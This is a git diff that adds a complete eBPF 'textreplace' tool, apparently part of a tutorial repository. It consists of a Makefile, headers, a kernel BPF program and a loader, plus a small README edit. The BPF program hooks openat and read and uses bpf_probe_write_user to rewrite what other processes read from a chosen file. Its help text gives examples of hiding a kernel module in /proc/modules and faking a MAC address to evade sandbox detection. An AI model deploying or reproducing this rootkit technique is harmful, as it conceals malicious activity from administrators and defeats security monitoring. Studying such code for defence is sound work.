INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/src/27-replace/Makefile b/src/27-replace/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/src/27-replace/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/src/27-replace/common.h b/src/27-replace/common.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/src/27-replace/common.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/src/27-replace/common_um.h b/src/27-replace/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/src/27-replace/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/src/27-replace/textreplace.bpf.c b/src/27-replace/textreplace.bpf.c new file mode 100644 index 0000000..648829d --- /dev/null +++ b/src/27-replace/textreplace.bpf.c @@ -0,0 +1,336 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +// NOTE: This should probably be a map-of-maps, with the top-level +// key bing pid_tgid, so we know we're looking at the right program +#define MAX_POSSIBLE_ADDRS 500 +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_name_addrs SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_to_replace_addrs SEC(".maps"); + +// Map holding the programs for tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the name of the file to replace text in +const int filename_len_max = 50; +const volatile int filename_len = 0; +const volatile char filename[filename_len_max]; + +// These store the text to find and replace in the file +const unsigned int text_len_max = 20; +const volatile unsigned int text_len = 0; +const volatile char text_find[filename_len_max]; +const volatile char text_replace[filename_len_max]; + +SEC("tp/syscalls/sys_exit_close") +int handle_close_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_enter_openat") +int handle_openat_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Get filename from arguments + char check_filename[filename_len_max]; + bpf_probe_read_user(&check_filename, filename_len, (char*)ctx->args[1]); + + // Check filename is our target + for (int i = 0; i < filename_len; i++) { + if (filename[i] != check_filename[i]) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + unsigned int zero = 0; + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + bpf_printk("[TEXT_REPLACE] PID %d Filename %s\n", pid, filename); + return 0; +} + +SEC("tp/syscalls/sys_exit_openat") +int handle_openat_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ctx->ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_enter_read") +int handle_read_enter(struct trace_event_raw_sys_enter *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the correct file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)ctx->args[0]; + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = ctx->args[1]; + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)ctx->args[2]; + bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr); + bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size); + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int find_possible_addrs(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int buff_addr = *pbuff_addr; + long unsigned int name_addr = 0; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ctx->ret <= 0) { + return 0; + } + long int buff_size = ctx->ret; + long int read_size = buff_size; + + bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr); + // 64 may be to large for loop + const unsigned int local_buff_size = 32; + const unsigned int loop_size = 32; + char local_buff[local_buff_size] = { 0x00 }; + + if (read_size > (local_buff_size+1)) { + // Need to loop :-( + read_size = local_buff_size; + } + + // Read the data returned in chunks, and note every instance + // of the first character of our 'to find' text. + // This is all very convoluted, but is required to keep + // the program complexity and size low enough the pass the verifier checks + unsigned int tofind_counter = 0; + for (unsigned int i = 0; i < loop_size; i++) { + // Read in chunks from buffer + bpf_probe_read(&local_buff, read_size, (void*)buff_addr); + for (unsigned int j = 0; j < local_buff_size; j++) { + // Look for the first char of our 'to find' text + if (local_buff[j] == text_find[0]) { + name_addr = buff_addr+j; + // This is possibly out text, add the address to the map to be + // checked by program 'check_possible_addrs' + bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY); + tofind_counter++; + } + } + + buff_addr += local_buff_size; + } + + // Tail-call into 'check_possible_addrs' to loop over possible addresses + bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter); + + bpf_tail_call(ctx, &map_prog_array, PROG_01); + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int check_possible_addresses(struct trace_event_raw_sys_exit *ctx) { + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int newline_counter = 0; + unsigned int match_counter = 0; + + char name[text_len_max+1]; + unsigned int j = 0; + char old = 0; + const unsigned int name_len = text_len; + if (name_len < 0) { + return 0; + } + if (name_len > text_len_max) { + return 0; + } + // Go over every possibly location + // and check if it really does match our text + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + newline_counter = i; + pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + bpf_probe_read_user(&name, text_len_max, (char*)name_addr); + for (j = 0; j < text_len_max; j++) { + if (name[j] != text_find[j]) { + break; + } + } + if (j >= name_len) { + // *********** + // We've found out text! + // Add location to map to be overwritten + // *********** + bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY); + match_counter++; + } + bpf_map_delete_elem(&map_name_addrs, &newline_counter); + } + + // If we found at least one match, jump into program to overwrite text + if (match_counter > 0) { + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int overwrite_addresses(struct trace_event_raw_sys_exit *ctx) { + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int match_counter = 0; + + // Loop over every address to replace text into + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + match_counter = i; + pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + + // Attempt to overwrite data with out replace string (minus the end null bytes) + long ret = bpf_probe_write_user((void*)name_addr, (void*)text_replace, text_len); + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, text_find); + + // Clean up map now we're done + bpf_map_delete_elem(&map_to_replace_addrs, &match_counter); + } + + return 0; +} diff --git a/src/27-replace/textreplace.c b/src/27-replace/textreplace.c new file mode 100644 index 0000000..f6621d0 --- /dev/null +++ b/src/27-replace/textreplace.c @@ -0,0 +1,202 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "textreplace.skel.h" +#include "common_um.h" +#include "common.h" + +// Setup Argument stuff +#define filename_len_max 50 +#define text_len_max 20 +static struct env { + char filename[filename_len_max]; + char input[filename_len_max]; + char replace[filename_len_max]; + int target_ppid; +} env; + +const char *argp_program_version = "textreplace 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"Text Replace\n" +"\n" +"Replaces text in a file.\n" +"To pass in newlines use \%'\\n' e.g.:\n" +" ./textreplace -f /proc/modules -i ppdev -r $'aaaa\\n'" +"\n" +"USAGE: ./textreplace -f filename -i input -r output [-t 1111]\n" +"EXAMPLES:\n" +"Hide kernel module:\n" +" ./textreplace -f /proc/modules -i 'joydev' -r 'cryptd'\n" +"Fake Ethernet adapter (used in sandbox detection): \n" +" ./textreplace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' \n" +""; + +static const struct argp_option opts[] = { + { "filename", 'f', "FILENAME", 0, "Path to file to replace text in" }, + { "input", 'i', "INPUT", 0, "Text to be replaced in file, max 20 chars" }, + { "replace", 'r', "REPLACE", 0, "Text to replace with in file, must be same size as -t" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'i': + if (strlen(arg) >= text_len_max) { + fprintf(stderr, "Text must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.input, arg, sizeof(env.input)); + break; + case 'r': + if (strlen(arg) >= text_len_max) { + fprintf(stderr, "Text must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.replace, arg, sizeof(env.replace)); + break; + case 'f': + if (strlen(arg) >= filename_len_max) { + fprintf(stderr, "Filename must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.filename, arg, sizeof(env.filename)); + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Replaced text in PID %d (%s)\n", e->pid, e->comm); + else + printf("Failed to replace text in PID %d (%s)\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct textreplace_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.filename[0] == '\x00' || env.input[0] == '\x00' || env.replace[0] == '\x00') { + printf("ERROR: filename, input, and replace all requried, see %s --help\n", argv[0]); + exit(1); + } + if (strlen(env.input) != strlen(env.replace)) { + printf("ERROR: input and replace text must be the same length\n"); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = textreplace_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Let bpf program know our pid so we don't get kiled by it + strncpy(skel->rodata->filename, env.filename, sizeof(skel->rodata->filename)); + skel->rodata->filename_len = strlen(env.filename); + skel->rodata->target_ppid = env.target_ppid; + + strncpy(skel->rodata->text_find, env.input, sizeof(skel->rodata->text_find)); + strncpy(skel->rodata->text_replace, env.replace, sizeof(skel->rodata->text_replace)); + skel->rodata->text_len = strlen(env.input); + + // Verify and load program + err = textreplace_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Add program to map so we can call it later + int index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.check_possible_addresses); + int ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.overwrite_addresses); + ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = textreplace_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + textreplace_bpf__destroy( skel); + return -err; +} diff --git a/src/28-detach/README.md b/src/28-detach/README.md index 02e7a11..a5625f1 100644 --- a/src/28-detach/README.md +++ b/src/28-detach/README.md @@ -1,6 +1,13 @@ # 后台运行 eBPF 程序 通过使用 `--detach` 运行程序,用户空间加载器可以退出,而不会停止 eBPF 程序。 + +编译: + +```bash +make +``` + 在运行前,请首先确保 bpf 文件系统已经被挂载: ```bash